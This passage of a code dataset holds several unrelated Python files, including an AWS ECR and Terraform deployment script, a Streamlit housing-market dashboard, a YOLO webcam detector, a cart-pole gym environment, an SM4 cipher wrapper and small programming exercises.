ecr_client.get_authorization_token()\n\n            registry_auth = token.get('authorizationData')\n            # get auth token for ecr\n            if registry_auth:\n                try:\n                    username, password = base64.b64decode(registry_auth[0]['authorizationToken']).decode().split(':')\n                    repository_name = registry_auth[0]['proxyEndpoint']\n                except IndexError as e:\n                    logging.error(f\"Error - {e}\")\n\n                # login and push the image\n                DOCKER_CLIENT.login(username, password, registry=repository_name)\n                DOCKER_CLIENT.images.push(f\"{repository_url}:latest\")\n\n\ndef create_terraform(profile: str, region: str) -> None:\n    \"\"\"\n    Create AWS structure from Terraform infrastructure\n    :return: AWS Object\n    \"\"\"\n    logging.info(\"Creating Terraform layout (may take a while...)\")\n    terraform = Terraform(working_dir=SERVICE_PATH)\n\n    try:\n        terraform.cmd(\"init\")\n    except FileNotFoundError:\n        logging.error(\"Terraform was not found in PATH. 
Please install it.\")\n        sys.exit(1)\n\n    terraform.cmd(f\"workspace new tstack\")\n    terraform.cmd(f\"workspace select tstack\")\n    return_code, _, stderr = terraform.cmd(\n        \"apply\",\n        vars=f\"profile={profile}\",\n        auto_approve=IsFlagged\n    )\n\n    logging.info(f\"Terraform Exit Code: {return_code}\")\n\n    if return_code == 0:\n        logging.info(\"new stack created\")\n    else:\n        if \"ExpiredToken\" in stderr:\n            logging.critical(\n                \"***token expired, please renew and try again ***\"\n            )\n        else:\n            logging.critical(\n                \"*** Ensure aws profile exists***\"\n            )\n        sys.exit(1)\n\n    print(terraform.output())\n\n\ndef clean_up(profile: str, region: str) -> None:\n    \"\"\"\n    remove everything created and the docker images\n    \"\"\"\n    try:\n        terraform = Terraform(working_dir=SERVICE_PATH)\n        terraform.cmd(\"init\")\n        terraform.cmd(f\"workspace select tstack\")\n    except (TerraformCommandError, KeyError):\n        logging.error(\"workspace doesn't exist\")\n        sys.exit(-1)\n\n    return_code, stdout, stderr = terraform.cmd(\n        \"destroy\",\n        var={\n            \"profile\": profile,\n            \"region\": region\n        },\n        auto_approve=IsFlagged,\n    )\n    logging.info(stdout)\n    logging.error(stderr)\n\n    # docker remove\n    if return_code == 0:\n        logging.info(f\"ECS Stack tstack destroy complete\")\n    \n\ndef parse_args() -> argparse.Namespace:\n    \"\"\"\n    Parse input args from the user into system args\n    :return: Namespace of options\n    \"\"\"\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        \"-p\",\n        \"--profile\",\n        type=str,\n        required=True,\n        default=\"default\",\n        help=\"The aws profile you're going to use\"\n    )\n    parser.add_argument(\n        \"-t\",\n        \"--type\",\n        type=str,\n        default=\"run\",\n        choices=[\"run\", \"image\", \"clean\"],\n        required=False,\n        help=\"\"\"options of what to do\n            run - will build terraform\n            clean - will destroy stacks and rmi docker images\n            image - will build the image\n            \"\"\"\n    )\n    parser.add_argument(\n        \"-r\",\n        \"--region\",\n        type=str,\n        default=\"us-east-1\",\n        required=False,\n        help=\"This is the aws region you are using. 
default is us-east-1\"\n    )\n\n    return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n    args = parse_args()\n    \n    # simple three-state run\n    if args.type == \"run\":\n        # apply terraform\n        create_terraform(args.profile, args.region)\n    elif args.type == \"image\":\n        # build docker image and push to ecr\n        create_docker_images_and_push(args.profile, args.region)\n    elif args.type == \"clean\":\n        clean_up(args.profile, args.region)\n    else:\n        logging.error(\"Error - invalid selection\")\n","repo_name":"jchamish/nginx-ha-ipaddress","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26654328357","text":"import pandas as pd\r\nimport streamlit as st\r\nimport numpy as np\r\n\r\n\r\ndef get_avg_price(market_metrics):\r\n    avg_prices = market_metrics.groupby('market_id',as_index=False)['median_sale_price'].mean()\r\n    return avg_prices\r\n\r\n\r\ndef max_score(score,mid,maxscore,maxid):\r\n    st.header(\"Market Hotness Calculator\")\r\n    st.text(\"Graph for the Avg sales price and their corresponding market_id\")\r\n    st.line_chart(pd.DataFrame(score,mid))\r\n    st.text(f\"The max sales {maxscore} has been done by the market id {maxid}\")\r\n    st.write(\"\")\r\n    st.write(\"\")\r\n    st.write(\"\")\r\n\r\n\r\n\r\ndef avg_sales(score,mid,city,mdi):\r\n\r\n    st.text(\"The below score is based on Average of the Sales after buying it\")\r\n    try:\r\n        market_id=st.number_input('Enter the Market ID to get the score')\r\n        ind=mid.index(int(market_id))\r\n        cind=mdi.index(int(market_id))\r\n        st.text(f\"The score is: {score[ind]} and the city where it belongs is {city[cind]}\")\r\n    except:\r\n        st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\nmarket=pd.read_csv(\"market.csv\")\r\nmarket_metrics=pd.read_csv(\"market_metrics.csv\")\r\nmarket_id=market_metrics.groupby('market_id').count().reset_index()\r\n\r\n\r\n# Removing null values from market dataframe\r\nmarket_nan = market.isnull().sum().sum()\r\nmarket=market.dropna()\r\n\r\n\r\n# Removing the null values and filling missing data present in the market metrics dataframe\r\nmetric_nan = market_metrics['median_list_price_psqft'].isnull().sum().sum()\r\npending_housedata=market_metrics[market_metrics[\"days_to_pending\"].isna() & market_metrics[\"days_to_sell\"].isna()]\r\npending_housedata=pending_housedata[pending_housedata[\"sold_homes_count\"]<5]\r\npending_housedata=pending_housedata[pending_housedata[\"new_listings_count\"]<10]\r\nindices=list(pending_housedata.index)\r\nmetrics=market_metrics.drop(indices)\r\nmetrics.days_to_pending.fillna(metrics.days_to_sell, inplace=True)\r\nmetrics.days_to_sell.fillna(metrics.days_to_pending, inplace=True)\r\n\r\n\r\n# This block is for calculating the avg price score\r\navg_price=get_avg_price(metrics)\r\nprice=pd.DataFrame(avg_price)\r\nscore=list(price[\"median_sale_price\"])\r\nmid=list(price[\"market_id\"])\r\n\r\ncity=list(market['city'])\r\nmdi=list(market['id'])\r\n\r\nmaxscore=max(score)\r\nind=score.index(maxscore)\r\nmaxind=mid[ind]\r\nmax_score(score,mid,maxscore,maxind)\r\navg_sales(score,mid,city,mdi)\r\n\r\n\r\n# This block is for calculating the days of sold\r\n\r\ndef get_avg_day(market_metrics):\r\n    avg_prices = market_metrics.groupby('market_id',as_index=False)['days_to_sell'].mean()\r\n    return avg_prices\r\n\r\n\r\ndef average_day(score2,mid2,city2,mdi2):\r\n\r\n    st.text(\"The below score is based on Average of the days to sell\")\r\n    try:\r\n        
marid=st.number_input('Enter the Market ID to get the score', key='avg_day')\r\n        ind=mid2.index(int(marid))\r\n        cind=mdi2.index(int(marid))\r\n        st.text(f\"The score is: {score2[ind]} and the city where it belongs is {city2[cind]}\")\r\n    except:\r\n        st.warning(\"Sorry, Enter correct Market id\")\r\n\r\n\r\ndef day_score(score2,mid2,maxscore2,maxid2):\r\n    st.write(\"\")\r\n    st.write(\"\")\r\n    st.write(\"\")\r\n    st.text(\"Graph for the Avg days to sell and their corresponding market_id\")\r\n    st.line_chart(pd.DataFrame(score2,mid2))\r\n    st.text(f\"The max sales {maxscore2} has been done by the market id {maxid2}\")\r\n    st.write(\"\")\r\n    st.write(\"\")\r\n    st.write(\"\")\r\n\r\n\r\navg_day=get_avg_day(metrics)\r\nprice2=pd.DataFrame(avg_day)\r\nscore2=list(price2[\"days_to_sell\"])\r\nmid2=list(price2[\"market_id\"])\r\n\r\ncity2=list(market['city'])\r\nmdi2=list(market['id'])\r\n\r\nmaxscore2=max(score2)\r\nind2=score2.index(maxscore2)\r\nmaxind2=mid2[ind2]\r\nday_score(score2,mid2,maxscore2,maxind2)\r\naverage_day(score2,mid2,city2,mdi2)\r\n\r\n#print(score2)\r\n","repo_name":"NavinAananthan/ZeroDown-Hackathon","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25763521533","text":"# Write a Python program to create a dictionary of phone numbers and names of five persons. 
Display the contents of the dictionary in alphabetical order of names \nph={}\ni=0\nwhile(i<5):\n    name = input(\"Enter name: \") \n    number = input(\"Enter phone number: \") \n    ph[name] = number\n    i=i+1\n\n\n    \nsorted_items = sorted(ph.items())  # sorts by name, the dictionary key\nprint(sorted_items)","repo_name":"JK432/Dictionary-of-phone-numbers","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32146170496","text":"import os\nimport cv2\nfrom tqdm import tqdm\nfrom pathlib import Path\n\n\ndef vid2frames(vid_file, save_folder, prefix=\"{:03d}.jpg\"):\n    vidcap = cv2.VideoCapture(vid_file)\n    success, image = vidcap.read()\n    count = 1\n    success = True\n    while success:\n        cv2.imwrite(os.path.join(save_folder, prefix.format(count)),\n                    image)  # save frame as JPEG file\n        count += 1\n        success, image = vidcap.read()\n\n\nif __name__ == '__main__':\n    video_files = sorted(Path(\"dataset/videos/videos\").glob(\"*.mp4\"))\n    save_top_folder = Path(\"dataset/videos/frames/\")\n\n    if not save_top_folder.exists():\n        os.mkdir(str(save_top_folder))\n\n    for video_file in tqdm(video_files, desc=\"Number of videos\"):\n        save_vid_folder = save_top_folder / video_file.stem\n        if not save_vid_folder.exists():\n            os.mkdir(save_vid_folder)\n\n        if not any(save_vid_folder.iterdir()):\n            vid2frames(str(video_file), str(save_vid_folder))\n","repo_name":"hgupta01/Weather_Intensity_Recognition","sub_path":"varg_video2frames.py","file_name":"varg_video2frames.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34525147398","text":"from collections import deque\n\nn = int(input())\ns = deque([input() for _ in range(n)])\nhistory = {}\n\nfor i in range(n):\n    query = s.popleft()\n    if(query in history):\n        print(query + \"(\" + str(history[query] + 1) +\")\" )\n        history[query]+=1\n    else:\n        print(query)\n        history[query]=0\n    # print(history)\n","repo_name":"kibutan/Atcoder","sub_path":"ABC261/C - NewFolder(1).py","file_name":"C - NewFolder(1).py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32636675851","text":"import numpy as np\nimport math\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\nfrom os import path\nfrom scipy.integrate import odeint\n\nfrom ..utils import ImageEncoder\nfrom ..gym_wrapper import GymWrapper\n\n__all__ = ['CartPole']\n\nclass GymCartPole(gym.Env):\n    metadata = {\n        'render.modes': ['human', 'rgb_array'],\n        'video.frames_per_second': 50\n    }\n\n    def __init__(self, *args, **kwargs):\n        self.gravity = 9.8\n        self.masscart = 1.0\n        self.masspole = 0.1\n        self.total_mass = (self.masspole + self.masscart)\n        self.length = 0.5 # actually half the pole's length\n        self.polemass_length = (self.masspole * self.length)\n        self.max_force = 10.0\n        self.tau = 0.02  # seconds between state updates\n\n        # Angle at which to fail the episode\n        self.theta_threshold_radians = 0.21 #12 * 2 * np.pi / 360\n        self.x_threshold = 0.5 #2.4\n\n        # Angle limit set to 2 * theta_threshold_radians so failing observation is still within bounds\n        high = np.array([\n            self.x_threshold * 2,\n            np.finfo(np.float32).max,\n            self.theta_threshold_radians * 2,\n            np.finfo(np.float32).max])\n\n        self.action_space = spaces.Box(low=-self.max_force, high=self.max_force, shape=(1,))\n        self.observation_space = spaces.Box(-high, high)\n\n        self.seed()\n        
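# Sketch (editorial aside, not part of any record): the duplicate-name numbering
# from the AtCoder record above, redone with collections.Counter. The function
# name is hypothetical; output matches the original (first repeat gets "(1)").
from collections import Counter

def number_duplicates(names):
    seen = Counter()
    out = []
    for q in names:
        out.append(q if seen[q] == 0 else f"{q}({seen[q]})")
        seen[q] += 1
    return out

assert number_duplicates(["a", "b", "a"]) == ["a", "b", "a(1)"]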
self.viewer = None\n self.state = None\n\n self.steps_beyond_done = None\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def dynamics(self, st, t, u):\n x, x_dot, theta, theta_dot = st\n # force = np.clip(u, -self.max_force, self.max_force)[0]\n force = u[0]\n # print(force, u)\n costheta = np.cos(theta)\n sintheta = np.sin(theta)\n temp = (force + self.polemass_length * theta_dot * theta_dot * sintheta) / self.total_mass\n thetaacc = (self.gravity * sintheta - costheta* temp) / (self.length * (4.0/3.0 - self.masspole * costheta * costheta / self.total_mass))\n xacc = temp - self.polemass_length * thetaacc * costheta / self.total_mass\n # x = x + self.tau * x_dot\n # x_dot = x_dot + self.tau * xacc\n # theta = theta + self.tau * theta_dot\n # theta_dot = theta_dot + self.tau * thetaacc\n dx = x_dot\n dx_dot = xacc\n dtheta = theta_dot\n dtheta_dot = thetaacc\n return np.array([dx, dx_dot, dtheta, dtheta_dot])\n\n def step(self,action):\n #assert self.action_space.contains(action), \"%r (%s) invalid\"%(action, type(action))\n #print (f\"state {self.counter} : {self.state}\")\n self.counter += 1\n state = self.state\n\n x, x_dot, theta, theta_dot = self.state\n cost = x**2 + theta**2 + x_dot**2 + theta_dot**2 + (action[0]**2)\n\n N = 2\n t = np.linspace(0, self.tau, N)\n self.state = odeint(self.dynamics, self.state, t, args=(action, ))[-1, :]\n # print(self.state)\n # print(action)\n # self.state = self.dynamics(state, action)\n x, x_dot, theta, theta_dot = self.state\n\n done = x < -self.x_threshold \\\n or x > self.x_threshold \\\n or x_dot < -self.x_threshold \\\n or x_dot > self.x_threshold \\\n or theta < -self.theta_threshold_radians \\\n or theta > self.theta_threshold_radians \\\n or theta_dot < -self.theta_threshold_radians \\\n or theta_dot > self.theta_threshold_radians\n done = bool(done)\n\n if not done:\n cost = -1.0\n else:\n cost = 1.0\n\n return self.state, -cost, False, {}\n\n def reset(self):\n self.counter = 0\n self.state = self.np_random.uniform(low=-0.05, high=0.05, size=(4,))\n # self.state = np.array([0.05, 0.05, 0.05, 0.05])\n self.steps_beyond_done = None\n return self.state\n\n def render(self, mode='human'):\n # screen_width = 600\n # screen_height = 400\n\n # world_width = self.x_threshold * 2\n # scale = screen_width/world_width\n # carty = 100 # TOP OF CART\n # polewidth = 10.0\n # polelen = scale * (2 * self.length)\n # cartwidth = 50.0\n # cartheight = 30.0\n\n # if self.viewer is None:\n # from gym.envs.classic_control import rendering\n # self.viewer = rendering.Viewer(screen_width, screen_height)\n # l, r, t, b = -cartwidth / 2, cartwidth / 2, cartheight / 2, -cartheight / 2\n # axleoffset = cartheight / 4.0\n # cart = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # self.carttrans = rendering.Transform()\n # cart.add_attr(self.carttrans)\n # self.viewer.add_geom(cart)\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)])\n # pole.set_color(.8, .6, .4)\n # self.poletrans = rendering.Transform(translation=(0, axleoffset))\n # pole.add_attr(self.poletrans)\n # pole.add_attr(self.carttrans)\n # self.viewer.add_geom(pole)\n # self.axle = rendering.make_circle(polewidth/2)\n # self.axle.add_attr(self.poletrans)\n # self.axle.add_attr(self.carttrans)\n # self.axle.set_color(.5, .5, .8)\n # self.viewer.add_geom(self.axle)\n # self.track = rendering.Line((0, carty), (screen_width, carty))\n # 
self.track.set_color(0, 0, 0)\n # self.viewer.add_geom(self.track)\n\n # self._pole_geom = pole\n\n # if self.state is None:\n # return None\n\n # # Edit the pole polygon vertex\n # pole = self._pole_geom\n # l, r, t, b = -polewidth / 2, polewidth / 2, polelen - polewidth / 2, -polewidth / 2\n # pole.v = [(l, b), (l, t), (r, t), (r, b)]\n\n # x = self.state\n # cartx = x[0] * scale + screen_width / 2.0 # MIDDLE OF CART\n # self.carttrans.set_translation(cartx, carty)\n # self.poletrans.set_rotation(-x[2])\n\n # return self.viewer.render(return_rgb_array=mode == 'rgb_array')\n print(self.counter, self.state)\n\n def close(self):\n if self.viewer:\n self.viewer.close()\n self.viewer = None\n\n\nclass CartPole(GymWrapper):\n\n environment_name = 'CartPole'\n entry_point = \"marvelgym.openai.cartpole:GymCartPole\"\n max_episode_steps = 50\n reward_threshold = -3.75 # ignore\n\n def __init__(self, **kwargs):\n config = {\n 'image': kwargs.pop('image', False),\n 'sliding_window': kwargs.pop('sliding_window', 0),\n 'image_dim': kwargs.pop('image_dim', 32),\n }\n super(CartPole, self).__init__(config)\n\n # def cost_fn(self, s, a):\n # x, x_dot, theta, theta_dot = s[:,0], s[:,1], s[:,2], s[:,3]\n # return x**2 + theta**2 + x_dot**2 + theta_dot**2 + (np.squeeze(a)**2)\n\n def torque_matrix(self):\n return 2e-4 * np.eye(self.get_action_dim()) #0.002\n\n def make_summary(self, observations, name):\n pass\n\n def is_image(self):\n return self.image\n\n def image_size(self):\n if self.image:\n return [self.image_dim, self.image_dim, 3]\n return None\n\n def start_recording(self, video_path):\n frame_shape = (800, 1200, 3)\n self.image_encoder = ImageEncoder(video_path, frame_shape, 30)\n\n def grab_frame(self):\n frame = self.render(mode='rgb_array')\n self.image_encoder.capture_frame(frame)\n\n def stop_recording(self):\n self.image_encoder.close()\n\n #specifications\n def training_settings(self):\n return {\n \"dp\": False,\n \"ilqr\": False,\n \"trpo\": True,\n \"training_iters\": 1,\n \"learning_rate\": 0.0001,\n \"train_safe\": True,\n \"train_ind\": True,\n \"train_reach\": False,\n \"train_performance\": False,\n \"lb_start\": np.array([-0.05,-0.05,-0.05,-0.05]),\n \"ub_start\": np.array([ 0.05, 0.05, 0.05, 0.05]),\n \"lb_safe\": np.array([-0.5,-0.5, -0.5, -0.5]),\n \"ub_safe\": np.array([ 0.5, 0.5, 0.5, 0.5]),\n \"lb_reach\": np.array([0., 0., 0., 0.]),\n \"ub_reach\": np.array([0., 0., 0., 0.]),\n \"lb_action\": None,\n \"ub_action\": None,\n \"lb_avoids\": None,\n \"ub_avoids\": None,\n }\n","repo_name":"RU-Automated-Reasoning-Group/VEL","sub_path":"training/marvelgym/openai/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"9079670664","text":"import typing\nfrom dataclasses import dataclass\n\nfrom tongsuopy.crypto.ciphers import AEADEncryptionContext, Cipher, CipherContext, algorithms, modes\n\nfrom bkcrypto import constants, types\n\nfrom .. import configs\nfrom ..options import SM4SymmetricOptions\nfrom . 
import base\n\n\n@dataclass\nclass SM4SymmetricRuntimeConfig(configs.BaseSM4SymmetricConfig, base.BaseSymmetricRuntimeConfig):\n\n mode_class: types.SM4ModeClass = None\n\n def __post_init__(self):\n super().__post_init__()\n\n key_sizes: typing.Set[int] = {key_size // 8 for key_size in algorithms.SM4.key_sizes}\n if self.key_size not in key_sizes:\n raise ValueError(f\"Optional key sizes are {key_sizes}, but got {self.key_size}\")\n\n try:\n self.mode_class = {\n constants.SymmetricMode.CTR: modes.CTR,\n constants.SymmetricMode.CBC: modes.CBC,\n constants.SymmetricMode.GCM: modes.GCM,\n constants.SymmetricMode.CFB: modes.CFB,\n }[self.mode]\n\n except KeyError:\n raise ValueError(f\"Unsupported mode: {self.mode}\")\n\n\nclass SM4SymmetricCipher(base.BaseSymmetricCipher):\n\n CIPHER_TYPE: str = constants.SymmetricCipherType.SM4.value\n\n CONFIG_DATA_CLASS: typing.Type[SM4SymmetricRuntimeConfig] = SM4SymmetricRuntimeConfig\n\n OPTIONS_DATA_CLASS: typing.Type[SM4SymmetricOptions] = SM4SymmetricOptions\n\n config: SM4SymmetricRuntimeConfig = None\n\n def __init__(\n self,\n key: typing.Optional[typing.Union[bytes, str]] = None,\n **options,\n ):\n super().__init__(key, **options)\n if self.config.key and len(self.config.key) < self.config.key_size:\n self.config.key += b\"\\x00\" * (self.config.key_size - len(self.config.key))\n\n def get_block_size(self) -> int:\n return algorithms.SM4.block_size // 8\n\n def _encrypt(self, plaintext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.encryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n ciphertext_bytes: bytes = cipher_ctx.update(plaintext_bytes)\n ciphertext_bytes += cipher_ctx.finalize()\n\n if self.config.mode == constants.SymmetricMode.GCM:\n encryption_metadata.tag = cipher_ctx.tag\n return ciphertext_bytes\n\n def _decrypt(self, ciphertext_bytes: bytes, encryption_metadata: base.EncryptionMetadata) -> bytes:\n\n mode_init_args: typing.List[bytes] = []\n if self.config.enable_iv:\n mode_init_args.append(encryption_metadata.iv)\n if encryption_metadata.tag:\n mode_init_args.append(encryption_metadata.tag)\n\n cipher: Cipher = Cipher(algorithms.SM4(self.config.key), self.config.mode_class(*mode_init_args))\n cipher_ctx: typing.Union[CipherContext, AEADEncryptionContext] = cipher.decryptor()\n if self.config.enable_aad:\n cipher_ctx.authenticate_additional_data(encryption_metadata.aad)\n plaintext_bytes = cipher_ctx.update(ciphertext_bytes)\n plaintext_bytes += cipher_ctx.finalize()\n return plaintext_bytes\n","repo_name":"TencentBlueKing/crypto-python-sdk","sub_path":"bkcrypto/symmetric/ciphers/sm4.py","file_name":"sm4.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"5187168032","text":"from PIL import Image\n\nimport torch\nimport torchvision.transforms.functional as TF\nimport visualpriors\nimport subprocess\nimport cv2\nimport numpy as np\n\nmode = ['autoencoding', 'depth_euclidean']# 'reshading', 'keypoints2d', 'edge_occlusion','curvature', 'edge_texture', 'keypoints3d', 'segment_unsup2d', 'segment_unsup25d','normal','segment_semantic', 'denoising' , 'inpainting',\n # 
'class_object',\n    # 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point']\ntool = 'cv'\n#not implemented: 'jigsaw', 'room_layout','class_scene', 'egomotion', 'nonfixated_pose','fixated_pose', 'point_matching', 'vanishing_point'\n# mismatch: 'class_object'\n# \n#'colorization',\n#\n#\n# \n# Download a test image\n# subprocess.call(\"curl -O https://raw.githubusercontent.com/StanfordVL/taskonomy/master/taskbank/assets/test.png\", shell=True)\n\n# Load image and rescale/resize to [-1,1] and 3x256x256\nif tool=='pil':\n    image = Image.open('./test/test.png')\n    print(type(image))\n    x = TF.to_tensor(TF.resize(image, 256)) * 2 - 1\n    print(x.dtype)\n    print(type(x))\nelse:\n    image=cv2.imread('./test/test.png')\n    x=torch.from_numpy(image)\n    print(x.dtype)\n    x = TF.to_tensor(image) * 2 - 1\n    # x = x.permute(2,0,1).float()* 2 - 1\n    print(x.dtype)\nx = x.unsqueeze_(0)\n\nfor i, m in enumerate(mode):\n\n    try:\n        representation = visualpriors.representation_transform(x, m, device='cpu')\n        print(representation.shape)# torch.Size([1, 8, 16, 16])\n    except:\n        print(m)\n\n    # Transform to normals feature and then visualize the readout\n    pred = visualpriors.feature_readout(x, m, device='cpu')\n\n    # Save it\n    TF.to_pil_image(pred[0] / 2. + 0.5).save('test_{}_readout.png'.format(m))","repo_name":"GELIELEO/attention_on_midlevel","sub_path":"tests/visualpriors_test.py","file_name":"visualpriors_test.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30383956959","text":"import cv2\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Load Yolo\r\nnet = cv2.dnn.readNet(\"/home/kasztp/git/yolov3/yolov3.weights\", \"/home/kasztp/git/yolov3/yolov3.cfg\")\r\nclasses = []\r\nwith open(\"/home/kasztp/git/yolov3/coco.names\", \"r\") as f:\r\n    classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\nfont = cv2.FONT_HERSHEY_PLAIN\r\n\r\nwhile(True):\r\n    # Capture frame-by-frame\r\n    ret, frame = cap.read()\r\n\r\n    height,width,channels = frame.shape\r\n    # Detecting objects\r\n    blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n    net.setInput(blob)\r\n    outs = net.forward(output_layers)\r\n\r\n    #Showing info on screen/ get confidence score of algorithm in detecting an object in blob\r\n    for out in outs:\r\n        for detection in out:\r\n            scores = detection[5:]\r\n            class_id = np.argmax(scores)\r\n            confidence = scores[class_id]\r\n            if confidence > 0.5:\r\n                #object detected\r\n                center_x= int(detection[0]*width)\r\n                center_y= int(detection[1]*height)\r\n                w = int(detection[2]*width)\r\n                h = int(detection[3]*height)\r\n\r\n                #rectangle coordinates\r\n                x=int(center_x - w/2)\r\n                y=int(center_y - h/2)\r\n\r\n                cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),1)\r\n                cv2.putText(frame,classes[class_id],(x,y),font,1,(255,255,255),1) \r\n\r\n    # Display the resulting frame\r\n    cv2.imshow('frame',frame)\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):\r\n        break\r\n\r\n# When everything done, release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"kasztp/yolo-test","sub_path":"yolo1.py","file_name":"yolo1.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21910752856","text":"#MY 
FORMULA\n\nimport math\n\na=float(input(\"\\nEnter the value of A:\\n\\n\"))\nb=float(input(\"\\nEnter the value of B:\\n\\n\"))\nc=float(input(\"\\nEnter the value of C:\\n\\n\"))\n\nwhile a==0:\n    a=float(input(\"The value of 'a' cannot be ZERO, please enter another value:\\n\\n\"))\n\nelse:\n    delta=b**2-4*a*c\n    print(\"\\n\\nDelta is:\",delta,\"\\n\\n\")\n\n    if delta<0:\n        print(\"No real root.\\n\\n\")\n\n    elif delta==0:\n        raiz1=(-b+math.sqrt(delta))/(2*a)\n        print(\"There is 1 real root.\\n\\n\")\n        print(\"The real root is:\",raiz1,\"\\n\\n\")\n\n    elif delta>0:\n        raiz1=(-b+math.sqrt(delta))/(2*a)\n        raiz2=(-b-math.sqrt(delta))/(2*a)\n        print(\"There are 2 real roots.\\n\\n\")\n        print(\"The real roots are:\",raiz1,\"\\n\\n\")\n        print(\"The real roots are:\",raiz2,\"\\n\\n\")\n\n#TEACHER'S FORMULA\n\ndeltaprof = b ** 2 - 4 * a * c\n\nif deltaprof == 0:\n    raiz1 =(-b + math.sqrt(deltaprof)) / (2 * a)\n    print(\"TEACHER'S EQUATION: The only root is: \", raiz1,\"\\n\\n\")\nelse:\n    if deltaprof < 0:\n        print(\"TEACHER'S EQUATION: The equation has no real roots\\n\\n\")\n    else:\n        raiz1 = (-b + math.sqrt(deltaprof)) / (2 * a)\n        raiz2 = (-b - math.sqrt(deltaprof)) / (2 * a)\n        print(\"TEACHER'S EQUATION: The first root is: \",raiz1,\"\\n\\n\")\n        print(\"TEACHER'S EQUATION: The second root is: \",raiz2,\"\\n\\n\")\n\n","repo_name":"cgsmendes/aulas","sub_path":"if-else-formulabascara.py","file_name":"if-else-formulabascara.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9067396311","text":"\"\"\"Json serialization utilities.\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport datetime\nimport decimal\nimport uuid\n\nfrom six import text_type\n\nfrom celery.utils.imports import symbol_by_name\n\ntry:\n    from django.utils.functional import Promise as DjangoPromise\nexcept ImportError:  # pragma: no cover\n    class DjangoPromise(object):  # noqa\n        pass\n\n__all__ = ['JsonEncoder', 'dumps']\n\n_JSON_EXTRA_ARGS = {\n    'simplejson': {'use_decimal': False},\n}\n\n\ndef get_best_json(attr=None,\n                  choices=['simplejson', 'json']):\n    for i, module in enumerate(choices):\n        try:\n            sym = ':'.join([module, attr]) if attr else module\n            return symbol_by_name(sym), _JSON_EXTRA_ARGS.get(module, {})\n        except (AttributeError, ImportError):\n            if i + 1 >= len(choices):\n                raise\n\n\njson, _json_args = get_best_json()\n\n\nclass JsonEncoder(get_best_json('JSONEncoder')[0]):\n    \"\"\"Thorn custom Json encoder.\n\n    Notes:\n        Same as django.core.serializers.json.JSONEncoder but preserves\n        datetime microsecond information.\n    \"\"\"\n\n    def default(self, o,\n                dates=(datetime.datetime, datetime.date),\n                times=(datetime.time,),\n                textual=(decimal.Decimal, uuid.UUID, DjangoPromise),\n                isinstance=isinstance,\n                datetime=datetime.datetime,\n                text_type=text_type):\n        if isinstance(o, dates):\n            if not isinstance(o, datetime):\n                o = datetime(o.year, o.month, o.day, 0, 0, 0, 0)\n            r = o.isoformat()\n            if r.endswith(\"+00:00\"):\n                r = r[:-6] + \"Z\"\n            return r\n        elif isinstance(o, times):\n            return o.isoformat()\n        elif isinstance(o, textual):\n            return text_type(o)\n        else:\n            return super(JsonEncoder, self).default(o)\n\n\ndef dumps(obj, encode=json.dumps, cls=JsonEncoder):\n    \"\"\"Serialize object as json string.\"\"\"\n    return encode(obj, cls=cls, 
